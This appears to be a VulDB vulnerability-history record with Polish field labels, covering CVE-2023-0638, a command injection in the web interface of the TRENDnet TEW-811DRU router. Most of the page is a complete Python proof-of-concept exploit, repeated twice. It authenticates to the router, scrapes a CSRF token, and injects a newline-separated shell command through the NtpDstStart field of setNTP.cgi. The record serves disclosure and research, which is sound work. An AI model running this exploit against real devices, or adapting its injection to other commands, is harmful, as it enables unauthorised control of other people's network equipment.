Pole | 2023-02-02 09:09 | 2023-02-02 09:10 | 2023-03-01 16:39 |
---|
vendor | TRENDnet | TRENDnet | TRENDnet |
name | TEW-811DRU | TEW-811DRU | TEW-811DRU |
version | 1.0.10.0 | 1.0.10.0 | 1.0.10.0 |
component | Web Interface | Web Interface | Web Interface |
cwe | 77 (przekroczenie uprawnień) | 77 (przekroczenie uprawnień) | 77 (przekroczenie uprawnień) |
risk | 2 | 2 | 2 |
cvss3_vuldb_av | N | N | N |
cvss3_vuldb_ac | L | L | L |
cvss3_vuldb_pr | H | H | H |
cvss3_vuldb_ui | N | N | N |
cvss3_vuldb_s | U | U | U |
cvss3_vuldb_c | H | H | H |
cvss3_vuldb_i | H | H | H |
cvss3_vuldb_a | H | H | H |
cvss3_vuldb_e | P | P | P |
cvss3_vuldb_rc | R | R | R |
availability | 1 | 1 | 1 |
publicity | 1 | 1 | 1 |
cve | CVE-2023-0638 | CVE-2023-0638 | CVE-2023-0638 |
responsible | VulDB | VulDB | VulDB |
date | 1675292400 (2023-02-02) | 1675292400 (2023-02-02) | 1675292400 (2023-02-02) |
cvss2_vuldb_av | N | N | N |
cvss2_vuldb_ac | L | L | L |
cvss2_vuldb_au | M | M | M |
cvss2_vuldb_ci | C | C | C |
cvss2_vuldb_ii | C | C | C |
cvss2_vuldb_ai | C | C | C |
cvss2_vuldb_e | POC | POC | POC |
cvss2_vuldb_rc | UR | UR | UR |
cvss2_vuldb_rl | ND | ND | ND |
cvss3_vuldb_rl | X | X | X |
cvss2_vuldb_basescore | 8.3 | 8.3 | 8.3 |
cvss2_vuldb_tempscore | 7.1 | 7.1 | 7.1 |
cvss3_vuldb_basescore | 7.2 | 7.2 | 7.2 |
cvss3_vuldb_tempscore | 6.5 | 6.5 | 6.5 |
cvss3_meta_basescore | 7.2 | 7.2 | 7.2 |
cvss3_meta_tempscore | 6.5 | 6.5 | 6.5 |
price_0day | $0-$5k | $0-$5k | $0-$5k |
language | | Python | Python |
sourcecode | | import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://0.0.0.0:8081',
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
login_header = {'Host': '0.0.0.0:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
time.sleep((3-loop)*3)
print('error:{}'.format(e))
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
pass | import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://0.0.0.0:8081',
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
login_header = {'Host': '0.0.0.0:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
time.sleep((3-loop)*3)
print('error:{}'.format(e))
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
pass |
cve_assigned | | | 1675292400 (2023-02-02) |
cve_nvd_summary | | | A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220018 is the identifier assigned to this vulnerability. |